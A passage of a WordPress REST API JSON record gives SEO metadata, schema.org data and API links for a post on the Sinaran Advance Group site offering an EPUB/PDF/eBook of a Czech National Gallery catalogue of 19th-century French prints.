\u010derven-\u010dervenec 1992 - (EPUB, PDF, eBooks) - Sinaran Advance Group","og_description":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 (Czech Edition) , Slovenskej N\u00e1rodnej Gal\u00e9rie Jako n\u011bkdo, kdo miluje \u010dten\u00ed a psan\u00ed, jsem v\u017edy vzru\u0161en z objevov\u00e1n\u00ed nov\u00fdch autor\u016f a titul\u016f, a mysl\u00edm si, \u017ee tato kniha rom\u00e1ny mohla [&hellip;]","og_url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/","og_site_name":"Sinaran Advance Group","article_published_time":"2025-12-15T09:56:14+00:00","article_modified_time":"2026-01-13T13:56:17+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/#article","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/"},"author":{"name":"admin","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d"},"headline":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 &#8211; (EPUB, PDF, eBooks)","datePublished":"2025-12-15T09:56:14+00:00","dateModified":"2026-01-13T13:56:17+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/"},"wordCount":1664,"publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/","url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/","name":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, ... \u010derven-\u010dervenec 1992 - (EPUB, PDF, eBooks) - Sinaran Advance Group","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/#website"},"datePublished":"2025-12-15T09:56:14+00:00","dateModified":"2026-01-13T13:56:17+00:00","breadcrumb":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/12\/15\/francouzska-grafika-19-stoleti-ze-sbirek-narodni-galerie-v-praze-pod-zastitou-francouzskeho-institutu-v-praze-narodni-galerie-v-praze-cerven-cervenec-1992-epub-pdf-ebooks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.sinaranadvance.com.my\/"},{"@type":"ListItem","position":2,"name":"Francouzsk\u00e1 grafika 19. stolet\u00ed: Ze sb\u00edrek N\u00e1rodn\u00ed galerie v Praze : pod z\u00e1\u0161titou Francouzsk\u00e9ho institutu v Praze : N\u00e1rodn\u00ed galerie v Praze, &#8230; \u010derven-\u010dervenec 1992 &#8211; (EPUB, PDF, eBooks)"}]},{"@type":"WebSite","@id":"https:\/\/www.sinaranadvance.com.my\/#website","url":"https:\/\/www.sinaranadvance.com.my\/","name":"Sinaran Advance Group","description":"","publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.sinaranadvance.com.my\/#organization","name":"Sinaran Advance Group","url":"https:\/\/www.sinaranadvance.com.my\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/","url":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","contentUrl":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","width":1085,"height":675,"caption":"Sinaran Advance Group"},"image":{"@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/sinaranadvance.com.my"],"url":"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/75851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/comments?post=75851"}],"version-history":[{"count":1,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/75851\/revisions"}],"predecessor-version":[{"id":75852,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/75851\/revisions\/75852"}],"wp:attachment":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/media?parent=75851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/categories?post=75851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/tags?post=75851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}